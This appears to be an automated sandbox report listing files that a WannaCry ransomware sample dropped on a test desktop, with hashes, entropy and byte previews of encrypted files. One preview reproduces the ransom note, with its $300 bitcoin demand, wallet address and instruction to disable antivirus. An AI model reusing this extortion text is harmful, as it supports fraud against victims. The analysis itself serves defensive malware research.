Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.824482472945718
Encrypted:	false
SSDEEP:	24:0oXyTWw3P2kpbVfWbvtiOId+GfE1xh0K7WgicPO:rXyz3+YVCildlfGX7G
MD5:	4EC95C15178D817C77FC78CF23834890
SHA1:	75B12F7770C4EAEA6DE2D931D5086E6DF3B52FB3
SHA-256:	EBB0D33374AFB40617AF7EEB6AE7A94B659120808D33501E9D5FF5FB57025C3A
SHA-512:	092EC5E1DC0AE949E391481252433263DFFC5E887E7105BD653A66E0E0DE43F90C3CA8C1B9F07215406BD75CC8BD4EFAA327B6645EEF80FDA34BB1A31E0D519D
Malicious:	true
Reputation:	unknown
Preview:	.d..._....P0..@.m.B..L<...5.,&.A...l......<....0...=...Ak..;....z^.X........Z.K...a...\.y....^.}..8.a...0....5.w..[y..t.b.M-....zP..]..\.Be.}....$/\.....B...E<C+..ND..+.G%.3..B..E..=.:a.p.D..0....".k8..5.3..M.W<n.^.6....../.'..W.-2f..wS..N..<...uN:.Ew\|.n.k^l...<.\|6 .X......k..B.$....."PO;p.(.).j.`.E...... J.....EUh.u.%..^....\.Y<.d.Z.TOi.-j:....Tz.MaY..gN./.c.U^,D.q?.w..d.........p.;Yi..[......(..\..,bF..;.F.b.G...t..X].....8...:G....8}A.......4...[.3%.........Y....i...y....%3.e.6....Y..H...F.Z..0....k@O.....`....(...2...l..bL.x..^..]....v#......;29h&A...2/%..Q..oz..h@....$..\\+N.I...Z}#..s.BqA.xR.-.{[....Z_:.>.....Z0...v...i\.z..H...s.qi..-.J.......~`J...OJ.....W".W..Ss.)..w1..@........N.@C...9G...d.......A..6~x...!H.(..m3b.l.......C../.Y......E\.>......'ur...IE..j".t...TQ..2VH.VI>.....M~...'.O..wW......\|.&.....$Z....x;..,...C.*...u.2.&..xH....r.&.E.L..L....p...I........Q\.w...e.[....~..8..Tr...\._.....$.[o...2..K...p..3R

C:\Users\user\Desktop\GIGIYTFFYT.xlsx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.851439261172203
Encrypted:	false
SSDEEP:	24:bke5TipPNUZzyRO4OLU4Dkx85GRYzx67wW/PbamNva/CzrcFNALavO:bke5epFUoM4Rakx80RYzxYw8bRQ/oIFg
MD5:	761B96CEB54F5D9AA26CF6AE43EA0106
SHA1:	9F098A78618C28E9807CD2C3E0B7A85FA6FC3F7C
SHA-256:	D6D2F99D24FE36E5821942F3C6E9CFF2813DBAF808F8D51160429B6955289759
SHA-512:	E574305C71AA45864BCE32BBE3B0461E832803B87C391D84EBDFFF93D5BA1A5291423D5426772B4CBBA7935FE328B0D99533358F4EA6A23EEC5B07823ACC2419
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......$......C.n..k.^....Yd.P....qn..>...&.l......~....SN..C.`9.....~.M.x]........x.b..L.Nf......z.{.Ew........0.\|.....=r..J..9.Vf@.:..cCv..+..w.................%ms....U..0wu...w...S.1?`.../.....q..08X.c..c.../r._.D...c.J.;.G...U..n.Q..Yk......q.....o[..............~5... \|......g.7z..K..x$T..2..R...AD......m.,..?..!..V....N.6..-b.d- .i...@.......qU..D.mK.....#...]1V.5-x..e...mC.L..B.L..c.....}.y....b{.xW..r...E.......5.ej...?...e+Y..;...Y.g.~.`.%...6.;.aw8...:.X...}.X$a..m:h9g..Kp..#8Y..U.z..._..i...e....e......2.e......=.{..........SS.F.........J...M:...)....x."f.1$...hN.8.-..ZEm.Y0.@I.D..M..u.Ex..N......Y.~...@..x.o..5.s..,.T..J......EM9B{^{.......D^oQ..E>U("4.\.?..H..D...y..QR..Y.=f .+x....yw.\|x ~....zRzn.a.'.t...:R.d....A..!.......~......w. .'..G2j..}...0}.......;..&d.H..%.\../..E{.C.`......l..Y3.T..R...+7..H..6.."..?..a......)}\D~......F..........k.UG.qX....(../.H....."."T.<.....1m..6..J.)R.y.`..Ke.^Q.....=......q.#6.11....5j1

C:\Users\user\Desktop\GIGIYTFFYT.xlsx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.851439261172203
Encrypted:	false
SSDEEP:	24:bke5TipPNUZzyRO4OLU4Dkx85GRYzx67wW/PbamNva/CzrcFNALavO:bke5epFUoM4Rakx80RYzxYw8bRQ/oIFg
MD5:	761B96CEB54F5D9AA26CF6AE43EA0106
SHA1:	9F098A78618C28E9807CD2C3E0B7A85FA6FC3F7C
SHA-256:	D6D2F99D24FE36E5821942F3C6E9CFF2813DBAF808F8D51160429B6955289759
SHA-512:	E574305C71AA45864BCE32BBE3B0461E832803B87C391D84EBDFFF93D5BA1A5291423D5426772B4CBBA7935FE328B0D99533358F4EA6A23EEC5B07823ACC2419
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......$......C.n..k.^....Yd.P....qn..>...&.l......~....SN..C.`9.....~.M.x]........x.b..L.Nf......z.{.Ew........0.\|.....=r..J..9.Vf@.:..cCv..+..w.................%ms....U..0wu...w...S.1?`.../.....q..08X.c..c.../r._.D...c.J.;.G...U..n.Q..Yk......q.....o[..............~5... \|......g.7z..K..x$T..2..R...AD......m.,..?..!..V....N.6..-b.d- .i...@.......qU..D.mK.....#...]1V.5-x..e...mC.L..B.L..c.....}.y....b{.xW..r...E.......5.ej...?...e+Y..;...Y.g.~.`.%...6.;.aw8...:.X...}.X$a..m:h9g..Kp..#8Y..U.z..._..i...e....e......2.e......=.{..........SS.F.........J...M:...)....x."f.1$...hN.8.-..ZEm.Y0.@I.D..M..u.Ex..N......Y.~...@..x.o..5.s..,.T..J......EM9B{^{.......D^oQ..E>U("4.\.?..H..D...y..QR..Y.=f .+x....yw.\|x ~....zRzn.a.'.t...:R.d....A..!.......~......w. .'..G2j..}...0}.......;..&d.H..%.\../..E{.C.`......l..Y3.T..R...+7..H..6.."..?..a......)}\D~......F..........k.UG.qX....(../.H....."."T.<.....1m..6..J.)R.y.`..Ke.^Q.....=......q.#6.11....5j1

C:\Users\user\Desktop\GIGIYTFFYT\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\Users\user\Desktop\GIGIYTFFYT\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\Users\user\Desktop\GIGIYTFFYT\CZQKSDDMWR.png

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.811361538152819
Encrypted:	false
SSDEEP:	24:iVNff5aQ5VqYLzSGGfvWTAr7q5NtDiWmh5Ng4UJ:6N5aQ5sY5aWTAr7q/EdfUJ
MD5:	A423A6E5A8D1A6FF1F0A1C29186CE006
SHA1:	5E41FF707B7B7A09E22022975506E819C3245419
SHA-256:	9D4CA689CA935CC7E70B7CE3D1743A2B623E0FD8C6775BEAA0892C83F1ED0B7E
SHA-512:	86FDF86055DD9E0AEA514DC13D6EF4EF0A6C731B0E94123171B5E37F2B5E10703A3BF3E42E97A79077FF3956555600587B360F91E099BF38F5D1A3798AF8A230
Malicious:	false
Reputation:	unknown
Preview:	..3.]B.~.A"q.e......".lge...:.....o...!../....=.....0........jo.4l.7..t......]..R.......o..x.'.K~\40....;rl.b.)eD....9oo.[7.PN_......t...Tw.._I=!...H.1.......I5w.. '...L....B.:...Hk..G..&v...2H%...1..1..L..#a&bf....t..r!.R..C&.^....E.I...\~..8...E.W.'...S^.....Q.+.+Eg...dV{.,..U.Sg.I0....C.-.N.,!R[uL.So.~F...g.C....t\|$Y-....$_.KoO>......)..[..r...}...O..G.W.t.Q.8ml.{.Cd...DM.Z.v..[.Y6&.M.2.......N... .k. .\\...{!..{..e...{..Z.lf-..\90.{.C.....#......zqe.1..r.Z6.\|!.j..I....(H....]..F..-.5..L.P...`Do.f(......%....W$M.,......=A./..N..4...q....T].7vtD...Aw5S.....o....b.^G...g..An.Q0...OYO.S.%.e..........}...O_.....\|.h.'...D_...H\|c.7T..%.FpH..h[..w1....6..."1..@.lyD..<.5...Ij.. 0...{\........U...%.vi..L'!....Qw...."`}.......}..e.......E..-+.P..c$.....?...b.....9Xt.........@..~L.....z).....!...~e.7.C.?.k%......+......<.I.r....'X1...p[5-.Pl.FeE..........<.L6.g1..7.\|.\.Y...Ml....m.3._l...?..w..m.3.q.R.3..0..........0.........A.P=...1.>.3u.5~d

C:\Users\user\Desktop\GIGIYTFFYT\CZQKSDDMWR.png.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.84056787938267
Encrypted:	false
SSDEEP:	24:bkPwlQak1txTgrJPIBEt3ltCorLl6iK38rBgJ6n2YoOZjf:bkqQaCTgdPIEJrRF6ihu6n3Lb
MD5:	3DB29A841FABABACD22AF9F3AFC5EEAF
SHA1:	FDA0B8005A748BDECB6215D294179EEDE565D495
SHA-256:	5EC744B65404C9687D9C50E2059690416D447FCDF7EF9F8898AC6EA6E9BE947C
SHA-512:	AF4C9C6C995655C38DAA78DC30AC45B039E2F696262D8C30A2AE91A8617A8B7854FA03278AA4D518A35BE41D6352E1A4796A7193F2647D1839F1A0B48265827F
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......'"8%.1.Jn.yB\|O.e......8&4.~F]...._..3...2.3.C.s..p.@l.,......h.L~......+.h........s...l.....$.ZO.....(.B.@..]1.R..Rr.6.Cx.6mC..w........]....`........W.M(k.cJ....d-!]...^7.R.Mi.6....\w...&.d.`?e.=.F.^..)...O.....wk.."`.....;........vE.#+.=.j.. ...............<...X.Q...v.9...h.....(....r.qU....<Qb3mJ....X.I.3..y.R.&AJ...h.......kB....5.......sSY...4....r..........?N...(N...T..>O....s/.=....w...).0P.8..M+5..9..VP....\|\....:...}j.........3o..Q....-)..>..,.J.v.5=.^I......%.E..n..}v.<R...I..y.-.....u......z.D.)CJ.x.=....7.^.1.0n.....$.8=M.d.......9^!.C.....nO.S..~1..{?..V. k.y......)...#...:.c..S..d.,....{.#e..Z1G..G..X.D./.;./(.G....(...Nk:.9..{/..\.{........../........j= ..U..hpM.YM.S..Tx.#..@....y....j_BK.e;#..H.<......Y.0.u.f.v$..V...p....t.<.!)\....^...-..07..d.....>....M...PD?oF..m.M.t.<.Gx~.'wD..8..o.I.0SY}4\|Z...........E{........d..Y..&......y....!MV..[.4i..5.Mz.0;.v.......B.\.....k%\.C5.i.S.<1..o.KB\|.2e.y-.......Y

C:\Users\user\Desktop\GIGIYTFFYT\CZQKSDDMWR.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.84056787938267
Encrypted:	false
SSDEEP:	24:bkPwlQak1txTgrJPIBEt3ltCorLl6iK38rBgJ6n2YoOZjf:bkqQaCTgdPIEJrRF6ihu6n3Lb
MD5:	3DB29A841FABABACD22AF9F3AFC5EEAF
SHA1:	FDA0B8005A748BDECB6215D294179EEDE565D495
SHA-256:	5EC744B65404C9687D9C50E2059690416D447FCDF7EF9F8898AC6EA6E9BE947C
SHA-512:	AF4C9C6C995655C38DAA78DC30AC45B039E2F696262D8C30A2AE91A8617A8B7854FA03278AA4D518A35BE41D6352E1A4796A7193F2647D1839F1A0B48265827F
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......'"8%.1.Jn.yB\|O.e......8&4.~F]...._..3...2.3.C.s..p.@l.,......h.L~......+.h........s...l.....$.ZO.....(.B.@..]1.R..Rr.6.Cx.6mC..w........]....`........W.M(k.cJ....d-!]...^7.R.Mi.6....\w...&.d.`?e.=.F.^..)...O.....wk.."`.....;........vE.#+.=.j.. ...............<...X.Q...v.9...h.....(....r.qU....<Qb3mJ....X.I.3..y.R.&AJ...h.......kB....5.......sSY...4....r..........?N...(N...T..>O....s/.=....w...).0P.8..M+5..9..VP....\|\....:...}j.........3o..Q....-)..>..,.J.v.5=.^I......%.E..n..}v.<R...I..y.-.....u......z.D.)CJ.x.=....7.^.1.0n.....$.8=M.d.......9^!.C.....nO.S..~1..{?..V. k.y......)...#...:.c..S..d.,....{.#e..Z1G..G..X.D./.;./(.G....(...Nk:.9..{/..\.{........../........j= ..U..hpM.YM.S..Tx.#..@....y....j_BK.e;#..H.<......Y.0.u.f.v$..V...p....t.<.!)\....^...-..07..d.....>....M...PD?oF..m.M.t.<.Gx~.'wD..8..o.I.0SY}4\|Z...........E{........d..Y..&......y....!MV..[.4i..5.Mz.0;.v.......B.\.....k%\.C5.i.S.<1..o.KB\|.2e.y-.......Y

C:\Users\user\Desktop\GIGIYTFFYT\GIGIYTFFYT.docx

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.81212931271317
Encrypted:	false
SSDEEP:	24:B0E3yaNWlsP5YtgezqCIo8IRrQG5YZc3T89MtQTivzNXXs:B0XaN68deBN+Qq8AlGG
MD5:	0246F84A94C5AA4CE0745089D32006E6
SHA1:	75933558C79EF4946B4F92A3DA184864146A394D
SHA-256:	B99AA28A4935D4D9A131141DD03FAC54F37DD5C34FA6E4381BF00E36B71D1C9C
SHA-512:	06B02EFA60DD6797D1A088E5028C41234F1832F6BEB11E762CBCDFD94051D2572CD7FD283623966681A3D4756367B06BECC633DE7C6CC80D1931AD9C550C201A
Malicious:	true
Reputation:	unknown
Preview:	.I!.aa...b.oe./..m..mxKl.... ..M'Zv..D.g..'7^..n.V.Q@-....Q.ysah,.it7..Ol.R>.7..^.....;....4.l....O.X.\|.9..^.....F./....+.z..o....`...@....9...8y.2.NF{<F..'-..<.i...>8...'}...1...5........914$.T._Vk.L.......E....S~5C......g.4jH......$W4~....>C...(....eQ.3.s.Y."...hU......."..A6.&,.^.Ve.L.;`..5T.`.-..0zt..\p.w~..Q..Q.).5.HI......EPn.D.$...X.Q$..:.`..D..=. .6..4.OU..dpZ.......5..h..ERO.G1&q.j.;.`..K.e......h..&....P.=...v,..F...r...S~..t..Z.##vL....7...~..'....\|\|..T._a."'.n..>....W..=c6rH.p..x...q2.$...E.N#....W......1+=.....Gei....P....b....7.:.i..&.@....I~..O.9.?d.F....D.s`.l.9W..A.O....#..........$...<.".:z..,......4.C.H.=EmQ..A......m.=.F?..d.3_..a..h.Xb.J.e..+Q.F[...3S....74.@...{..&...m....G..v.a4..G.t.,.%e.w.4...ZS..w.bN.;..Ln.E....(4........od.U#p1.RK.c..L'.T]oQ..L\.n.....A=..r...Ye7..k.....;1er......p<.....4......7h+$....rU.P..-.\u....zPR..P<.,...../...ysJ*.....R.]w..a.{..m<.......F.Bis.c...oq...%H.L}.q&9W..bh...<P.}.&..R.j.2^....{0qn...,.....

C:\Users\user\Desktop\GIGIYTFFYT\GIGIYTFFYT.docx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.828242800965715
Encrypted:	false
SSDEEP:	24:bkkbh6LTItIf1ziFGBZbS062Av0MFlkZM0z7gGJPNnK1n:bkkbMLTItIf1ziFybnav0Mzyh7gGW1n
MD5:	BC690139C7E1FCF227407AE436641C35
SHA1:	9EC677AB6D17A72D84254A91434DC5BADAF3A36C
SHA-256:	20CDBB09050200AC9AED360A2362265E25BB4FD34F31FB6D5CD997C234792D8D
SHA-512:	0A8DEB320C7EFF1C3E864FF4992B6471D7DC4FF4E905EF9CD3EB6A2D968F907E635C20FA88A7B90E86989279448D40FC0B7EA57B6085EAFC9360F1A2BFD13DE4
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....b.k'..a.5...../h._..d.y@.....t..vi>U>.....VH.<_..;{1..-.=~..0.K.O<.`..P...Xz..45...h...R...l..n\|^R....j.{..,.+.....R.TDSN x....\|..&.+Ge..tmF.041.c_...M<&...u.\|.M+T..X.7....`n..Ly.@1.W.........U.P..w"/P..A......(.m..L._..\..."n...d.OA..P................?hi.e+.....D...z.r....A".m.$.T..B.....i..-.n.....5.....[....e\|.._/.D..ye.Y.....7...Rda..?.9....\|....U^.....h.....~cq.F]....]iZ..K..$..k,7...s.E......?G-X...3\|.H.Eu...hJ..z...a..:`..(...~.v).R.l.N...b.Ti..UbF...p.zPXM&...cJ.p...]C0..{(.:..&.JF........8..+.2..J.{!.c.k..n..C.....mOu..xf.....Q.....(......d.;.aD.xy.g..\|/.X-......JH...>U.HG....e....0..A......Z0F ..u..en.+......Q$....r.L.9.......5..'...t.(<i.0,.vk.....yk.pv`#.......r..... ._./.vK............W6...P.<..%..z.#x ..k.9~(;.k......pR.t.7C........C^.._..(5 .....3.BMU..........B.Y..D.r..fBFGxk....P-8...~...TF.'...^. i.V...4.}.OX.....]..5.1c.E....o.. .nD..ir.Ui........e...".....&../.4....#.T.'~S....A..&R..$y.d...9..s..r..

C:\Users\user\Desktop\GIGIYTFFYT\GIGIYTFFYT.docx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.828242800965715
Encrypted:	false
SSDEEP:	24:bkkbh6LTItIf1ziFGBZbS062Av0MFlkZM0z7gGJPNnK1n:bkkbMLTItIf1ziFybnav0Mzyh7gGW1n
MD5:	BC690139C7E1FCF227407AE436641C35
SHA1:	9EC677AB6D17A72D84254A91434DC5BADAF3A36C
SHA-256:	20CDBB09050200AC9AED360A2362265E25BB4FD34F31FB6D5CD997C234792D8D
SHA-512:	0A8DEB320C7EFF1C3E864FF4992B6471D7DC4FF4E905EF9CD3EB6A2D968F907E635C20FA88A7B90E86989279448D40FC0B7EA57B6085EAFC9360F1A2BFD13DE4
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....b.k'..a.5...../h._..d.y@.....t..vi>U>.....VH.<_..;{1..-.=~..0.K.O<.`..P...Xz..45...h...R...l..n\|^R....j.{..,.+.....R.TDSN x....\|..&.+Ge..tmF.041.c_...M<&...u.\|.M+T..X.7....`n..Ly.@1.W.........U.P..w"/P..A......(.m..L._..\..."n...d.OA..P................?hi.e+.....D...z.r....A".m.$.T..B.....i..-.n.....5.....[....e\|.._/.D..ye.Y.....7...Rda..?.9....\|....U^.....h.....~cq.F]....]iZ..K..$..k,7...s.E......?G-X...3\|.H.Eu...hJ..z...a..:`..(...~.v).R.l.N...b.Ti..UbF...p.zPXM&...cJ.p...]C0..{(.:..&.JF........8..+.2..J.{!.c.k..n..C.....mOu..xf.....Q.....(......d.;.aD.xy.g..\|/.X-......JH...>U.HG....e....0..A......Z0F ..u..en.+......Q$....r.L.9.......5..'...t.(<i.0,.vk.....yk.pv`#.......r..... ._./.vK............W6...P.<..%..z.#x ..k.9~(;.k......pR.t.7C........C^.._..(5 .....3.BMU..........B.Y..D.r..fBFGxk....P-8...~...TF.'...^. i.V...4.}.OX.....]..5.1c.E....o.. .nD..ir.Ui........e...".....&../.4....#.T.'~S....A..&R..$y.d...9..s..r..

C:\Users\user\Desktop\GIGIYTFFYT\QCOILOQIKC.pdf

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.820772286672497
Encrypted:	false
SSDEEP:	24:yk9zFJlZI65elQiaxFnjym9uTjS0ZTdqrc+iWWyYrX:NzhZI6MWiaxlATG0ZdqbiX
MD5:	FFAE68E120FE0A72CA97B8A02BD0CB8A
SHA1:	EA4B84C3E06CFE8D8DA97FAE9015A79E6A952437
SHA-256:	0C83A31C0E072425936B590818B55E80148CDC0AD2BACE74B82AEFBBA0B94FB2
SHA-512:	085297D2AB208EAA7C1BDAADBF4A64DC15D1EE8F332FF2D34799226D0B6CA96A42794B76168E19A63CF6C76542C2AEFDC8375AFCC0172C3A0E23B0271D542886
Malicious:	false
Reputation:	unknown
Preview:	Y.1.9.&...Z..\....V...4..N{....p.)...gv..i...C.....)..........W.I'.....e@.`...E.m........9n.....vDJ_..4..6.q.....i.Q.....0-....Fom..q.....G...2...K..>..:vd_.N<)..\|....L.y...p....Z.^..M..&..#.^V.q...xb.....f.!....D.....o;\$..).....R..u....Hj..9..w.w..$....X..c..6.P....?...Z.......s...u..&.C.........7..f.i..g....t...@....p.s7...[..4~..9...A9.PRG..:..I.3.......D.).5.G..w...'..:.`.Q-..6..Q.8afA.G...x.`Q07.xF.u.s....0.OhY.....]>...:+%#J.J.9..H.n/...:..Z..^...iJ.K.sC.n.:...x`..+.@..!......_....W..j...m.\|.xuL..w....e._..(#..u.#..@...c./.....2...v....cf...yT.JV.A...4.5.VV.F2.._G....!.,.U..H~V..?...'..%..."B.I../.......9x.4..Ar...}.$......(..Wyl..E..$)....o.\..X..;.k{.y.E.]..CP&\.nc ..@....pQ.IJ....:6..e4....j..R......rU.>.X..Z......bQ....i.h.I.}Q..ei.;.~.z..J0l.S.wu(.,.Q..62Z....o...NZ..j...>.D.N.Y\.....a..}.\..O..O.V0.C.jZ.....Q?.#......uX8.&..jZb./........k......Z.G+.....)...Z....u.+...4.....zp^9/...#.b....`..}.M..{..U..........8..

C:\Users\user\Desktop\GIGIYTFFYT\QCOILOQIKC.pdf.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.848695868080268
Encrypted:	false
SSDEEP:	24:bkn8FDboCKACDrHL1R7imC+NLCr3Ty5+XWdI1+p60EQ7DLYKVuX:bkn8Fn5Cz1EmrlCvy5+XWe1+U0EQXVuX
MD5:	C2D9539E32CAC4A57B60EBB321803036
SHA1:	8FB4E6D5FEF7E0AE60D1AD46C6A6128461295F72
SHA-256:	3DD41FDBD53A41EE07076834C78128B30FA120BFB7AF54848CD3E49CC021B9E6
SHA-512:	72E1FE55A8D3E2E7EB3042624F6762CBC6631AD4D7591CCBF92713308DC1465D1643398BF994A1939A4FCAFB8F57E0183A4597CB0B1E5B3453FC482C7B8C83F0
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....^..3...f..r....[.)<u..5Sb.7K.z.f..h.`.T.......1.O.../....8..........Y.P....gk....7...h.......O..D.L,..?..B...d.+..0.Vo4KZ.<...s+.....\OK.x)e/Pk..3\|.R...a.m1J.A.p;t..oK....C...E.1 V.M.^.6...H..{..g.X36...7.x.!........Hus.Y....,....2................>....D...."Z./....e......^K...GC^.Y..8I8R...F.....N.4.IM.Y,J..\..bbv......V..I2....x...H.;`h....,.z..?....9#..u.....tN5..i.......I..q.[x..~.Q)Gu..\...Q..5..\|_.B.2{..ty...o..X-....M....we.'....8..3..f.."m=d..?!\....e-/w_<._u.\..un..B.#.<..zr.-!..gL..../.d...?\.U.t..b60(Be..o. ....._.n...k...7.....!.U...{..~c.z... L.Fp.az....9...9."I.............E".$._p.....%..vt.mZ.....a...T\|.R.`..d...V.i2....z.x.b..1..x.6a.'.[.k..b...x.m@\|..u4a.,.(...k...._.F..!.ND?..........\3C.\|....)S5..@!....C.i..A.d......n.U=I.....J....%...LkM.%.xa%..MK{......=..W.oW.l......I..ZPk_.N.....o.....<..#Bk.(R.?R....ZBxR.X.5u..7.T.\...E~Jt..8.b<I3)J.. 9D._..._..F..\L...R.c.s.s<Ni.p.!....=...=.i.hHK_....

C:\Users\user\Desktop\GIGIYTFFYT\QCOILOQIKC.pdf.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.848695868080268
Encrypted:	false
SSDEEP:	24:bkn8FDboCKACDrHL1R7imC+NLCr3Ty5+XWdI1+p60EQ7DLYKVuX:bkn8Fn5Cz1EmrlCvy5+XWe1+U0EQXVuX
MD5:	C2D9539E32CAC4A57B60EBB321803036
SHA1:	8FB4E6D5FEF7E0AE60D1AD46C6A6128461295F72
SHA-256:	3DD41FDBD53A41EE07076834C78128B30FA120BFB7AF54848CD3E49CC021B9E6
SHA-512:	72E1FE55A8D3E2E7EB3042624F6762CBC6631AD4D7591CCBF92713308DC1465D1643398BF994A1939A4FCAFB8F57E0183A4597CB0B1E5B3453FC482C7B8C83F0
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....^..3...f..r....[.)<u..5Sb.7K.z.f..h.`.T.......1.O.../....8..........Y.P....gk....7...h.......O..D.L,..?..B...d.+..0.Vo4KZ.<...s+.....\OK.x)e/Pk..3\|.R...a.m1J.A.p;t..oK....C...E.1 V.M.^.6...H..{..g.X36...7.x.!........Hus.Y....,....2................>....D...."Z./....e......^K...GC^.Y..8I8R...F.....N.4.IM.Y,J..\..bbv......V..I2....x...H.;`h....,.z..?....9#..u.....tN5..i.......I..q.[x..~.Q)Gu..\...Q..5..\|_.B.2{..ty...o..X-....M....we.'....8..3..f.."m=d..?!\....e-/w_<._u.\..un..B.#.<..zr.-!..gL..../.d...?\.U.t..b60(Be..o. ....._.n...k...7.....!.U...{..~c.z... L.Fp.az....9...9."I.............E".$._p.....%..vt.mZ.....a...T\|.R.`..d...V.i2....z.x.b..1..x.6a.'.[.k..b...x.m@\|..u4a.,.(...k...._.F..!.ND?..........\3C.\|....)S5..@!....C.i..A.d......n.U=I.....J....%...LkM.%.xa%..MK{......=..W.oW.l......I..ZPk_.N.....o.....<..#Bk.(R.?R....ZBxR.X.5u..7.T.\...E~Jt..8.b<I3)J.. 9D._..._..F..\L...R.c.s.s<Ni.p.!....=...=.i.hHK_....

C:\Users\user\Desktop\GIGIYTFFYT\TQDFJHPUIU.xlsx

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.837451735594573
Encrypted:	false
SSDEEP:	24:BLbud6mfHFn5vfWrGUC4W8Z2tfPZe59xQbqqVMVnlGJGS0XRWScPxo:1ud6mflnJ0PC28FPZezxQbqqV2cScm
MD5:	F43A31BC67A67B0FFC8274DF7A736BD1
SHA1:	781DA967ACA5AC9085B9D35EDDEDEB9498C055BC
SHA-256:	2FCD5CC3D042B343495A2AB6178804CBB790465BACFED48CD3C5083D2C9F214B
SHA-512:	5BCAAA4D5767CB21FD9447D240214CAB95653A1D10859626BF5C4DDEC4FA4E0EF2415D38F175A132ACBB699D00EAF7530954B2AAC839382A4C91AB1D4CDC39B7
Malicious:	false
Reputation:	unknown
